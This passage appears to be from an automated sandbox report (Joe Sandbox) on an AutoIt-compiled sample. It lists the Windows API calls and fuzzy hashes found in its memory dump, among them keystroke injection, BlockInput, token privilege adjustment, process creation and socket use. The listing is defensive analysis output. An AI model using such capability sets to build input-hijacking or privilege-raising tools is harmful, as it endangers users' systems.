                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0023ACD3: inet_addr.WS2_32(00000000), ref: 0023ACF5
                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0023973D
                                                                                                                                                                  • WSAGetLastError.WS2_32(00000000,00000000), ref: 00239760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4170576061-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0022F37A
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022F3AA
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022F3BF
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0022F3D0
                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0022F3FE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2387731787-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0022439C
                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 002243B8
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00224425
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00224483
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024EFE2
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0025F3C3,?,?,?,?,?), ref: 0024EFF7
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024F041
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0025F3C3,?,?,?), ref: 0024F077
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1423138444-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0022221E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                  • String ID: ($|
                                                                                                                                                                  • API String ID: 1659193697-1631851259
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 001FAE5E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00234A1E,00000000), ref: 002355FD
                                                                                                                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00235629
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 599397726-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022EA95
                                                                                                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0022EAEF
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0022EB3C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1682464887-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • GetParent.USER32(?), ref: 0025F4B5
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,001FADDD,?,?,?,00000006,?), ref: 0025F52F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 314495775-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0022708D
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00227098
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseControlDeviceHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2349616827-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0022FD71
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0022FDA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: 92341f4836a7eee8886deb3d090e19ed7fa8db77a1dcfc58f64d513d8be81a17
                                                                                                                                                                  • Instruction ID: 36706adc63b3ec402003db5cfc672fc92a5faa89667fb247f4e31168cac3556c
                                                                                                                                                                  • Opcode Fuzzy Hash: 92341f4836a7eee8886deb3d090e19ed7fa8db77a1dcfc58f64d513d8be81a17
                                                                                                                                                                  • Instruction Fuzzy Hash: EA11C4316106049FD700DF69D849A2AF7E8FF98324F00856EF9A9DB291DB74EC058B81
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0025F352,?,?,?), ref: 0024F115
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0024F0FB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1273190321-0
                                                                                                                                                                  • Opcode ID: 423cae1c5eee4b696c75b979e6f4cad2c22e0fb846f6fb17627875f46a7bc4be
                                                                                                                                                                  • Instruction ID: 15eba0574a4309bdd63aafc8210a3be590a2e3e6b96e350e3cc8bab1da08e334
                                                                                                                                                                  • Opcode Fuzzy Hash: 423cae1c5eee4b696c75b979e6f4cad2c22e0fb846f6fb17627875f46a7bc4be
                                                                                                                                                                  • Instruction Fuzzy Hash: 3201B535210204EFDB259F14ED49F6A3F66FFC6364F184124F91A1B2A1C7719822DB51
                                                                                                                                                                  APIs
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024F47D
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0025F42E,?,?,?,?,?), ref: 0024F4A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3420055661-0
                                                                                                                                                                  • Opcode ID: ec4c51ea18329ba9444529fc11f6bc4e06b80272155182d2332f914a71554f7f
                                                                                                                                                                  • Instruction ID: b8727e331c05e2b36de7766d74451e261426d84264b7b21d1318bb6883f66502
                                                                                                                                                                  • Opcode Fuzzy Hash: ec4c51ea18329ba9444529fc11f6bc4e06b80272155182d2332f914a71554f7f
                                                                                                                                                                  • Instruction Fuzzy Hash: A5F0307691011CFFEF049F55EC099AE7FB8FF44351F14401AF902A2160D7B5AA51DB60
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0023C2E2,?,?,00000000,?), ref: 0022D73F
                                                                                                                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0023C2E2,?,?,00000000,?), ref: 0022D751
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                                                  • Opcode ID: 173c31c08ffc468eb63f010cb07e50b660c562934b8a4442c97563e5dda49e21
                                                                                                                                                                  • Instruction ID: a6e6e4ba491b7afcbf5a9f6d33c8b5280966dfe85530a61baa91dcfd777c2f45
                                                                                                                                                                  • Opcode Fuzzy Hash: 173c31c08ffc468eb63f010cb07e50b660c562934b8a4442c97563e5dda49e21
                                                                                                                                                                  • Instruction Fuzzy Hash: C4F0E23551032DBBDB10AFA4DC48FEA776CAF49350F008011F905D2181D3709980CFA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00224B89
                                                                                                                                                                  • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00224B9C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InputSendkeybd_event
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3536248340-0
                                                                                                                                                                  • Opcode ID: 71d291f1df8d6d4fde866cc23dd7b31bb906c1d4ecfe43f2cc025b7e06cac599
                                                                                                                                                                  • Instruction ID: 31ef8aa8fd09638adf9d662d9bba204145c3a95da592aa8acc0abce929186dc6
                                                                                                                                                                  • Opcode Fuzzy Hash: 71d291f1df8d6d4fde866cc23dd7b31bb906c1d4ecfe43f2cc025b7e06cac599
                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF06D70D1024EAFDB059FA1D809BBE7BB4AF00309F00C40AF951A5191D3B9C6119F94
                                                                                                                                                                  APIs
                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0021B9EC), ref: 0021B8C5
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0021B9EC), ref: 0021B8D7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 81990902-0
                                                                                                                                                                  • Opcode ID: 6b511c2ee5d9e0bef0ebe88523678decd776153716af9bbb1f250a3b10a10705
                                                                                                                                                                  • Instruction ID: 395a31563f065e932f4f0e1522868804f53b8336d4beba6f13ccdacf3e261092
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b511c2ee5d9e0bef0ebe88523678decd776153716af9bbb1f250a3b10a10705
                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE0B672414611AFE7262B64FC49EB6BBF9EF04311B11C869F49A81471DBA2ACE0DB10
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0024F59C
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0025F3AD,?,?,?,?), ref: 0024F5C6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,001E125D,00207A43,001E0F35,?,?,00000001), ref: 00208E41
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00208E4A
Memory Dump Source
• Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
• Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00250352
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0024E7AF
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4084987330-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                    • Part of subcall function 001FB736: GetCursorPos.USER32(000000FF), ref: 001FB749
                                                                                                                                                                    • Part of subcall function 001FB736: ScreenToClient.USER32(00000000,000000FF), ref: 001FB766
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000001), ref: 001FB78B
                                                                                                                                                                    • Part of subcall function 001FB736: GetAsyncKeyState.USER32(00000002), ref: 001FB799
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0025F417,?,?,?,?,?,00000001,?), ref: 0024EA9C
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2356834413-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,001FAF40,?,?,?,?,?), ref: 001FB83B
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • BlockInput.USER32(00000001), ref: 00237057
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlockInput
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0024F41A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 001FACC7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0025F3D4,?,?,?,?,?,?), ref: 0024F450
                                                                                                                                                                    • Part of subcall function 0024E13E: _memset.LIBCMT ref: 0024E14D
                                                                                                                                                                    • Part of subcall function 0024E13E: _memset.LIBCMT ref: 0024E15C
                                                                                                                                                                    • Part of subcall function 0024E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002A3EE0,002A3F24), ref: 0024E18B
                                                                                                                                                                    • Part of subcall function 0024E13E: CloseHandle.KERNEL32 ref: 0024E19D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2364484715-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 0024F3A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 0024F3D0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                    • Part of subcall function 001FB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001FB85B), ref: 001FB926
                                                                                                                                                                    • Part of subcall function 001FB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,001FB85B,00000000,?,?,001FAF1E,?,?), ref: 001FB9BD
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,001FAF1E,?,?), ref: 001FB864
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2797419724-0
                                                                                                                                                                  • Opcode ID: fe7548c5b3f28e083d72eb1157252f690b8c523f4d2d4ee581b018bb5cc8ce59
                                                                                                                                                                  • Instruction ID: 2738762cddd7c915b02e39b134d2ce70e90b31bbb1ceba4eafdb664d14486361
                                                                                                                                                                  • Opcode Fuzzy Hash: fe7548c5b3f28e083d72eb1157252f690b8c523f4d2d4ee581b018bb5cc8ce59
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CD012B528430C77DB102B61DC0BF5D3E1EAB51790F908421F705691E18BB568209555
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00208E1F
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: b0ebb107affe37fb24512d106e132bdaad53b73d034ee591982065be57788447
                                                                                                                                                                  • Instruction ID: 9e888ac09a23f7335d78e35e9738743be4ee503f33115ba5cb3259dd81f9bbe0
                                                                                                                                                                  • Opcode Fuzzy Hash: b0ebb107affe37fb24512d106e132bdaad53b73d034ee591982065be57788447
                                                                                                                                                                  • Instruction Fuzzy Hash: F9A0123000050CA78A001B51FC084447F5CD6041507008050F40C00121877354204985
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00206AE9,002967D8,00000014), ref: 0020A937
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 9fd3fc888256f31d8e2a208100cfdbbb755e94357bf08996ec5b7acd1390e795
                                                                                                                                                                  • Instruction ID: d6127ef7e1551add6701aae70b7a94b4d45ef3c1d7990031ec21f6ab875fdb77
                                                                                                                                                                  • Opcode Fuzzy Hash: 9fd3fc888256f31d8e2a208100cfdbbb755e94357bf08996ec5b7acd1390e795
                                                                                                                                                                  • Instruction Fuzzy Hash: BEB012B47031034BDB084B38BC9C11B39D4574B30131180BDB007C3560DF708410DF00
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0023A7A5
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0023A7B7
                                                                                                                                                                  • DestroyWindow.USER32 ref: 0023A7C5
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0023A7DF
                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0023A7E6
                                                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0023A927
                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0023A937
                                                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023A97F
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0023A98B
                                                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0023A9C5
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023A9FA
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AA05
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0023AA0E
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AA1D
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0023AA26
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AA2D
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0023AA38
                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0023AA4A
                                                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0026D9BC,00000000), ref: 0023AA60
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0023AA70
                                                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0023AA96
                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0023AAB5
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023AAD7
                                                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0023ACC4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Global$Rect$Create$DeleteFileFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                  • API String ID: 2148010464-2373415609
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 0024D0EB
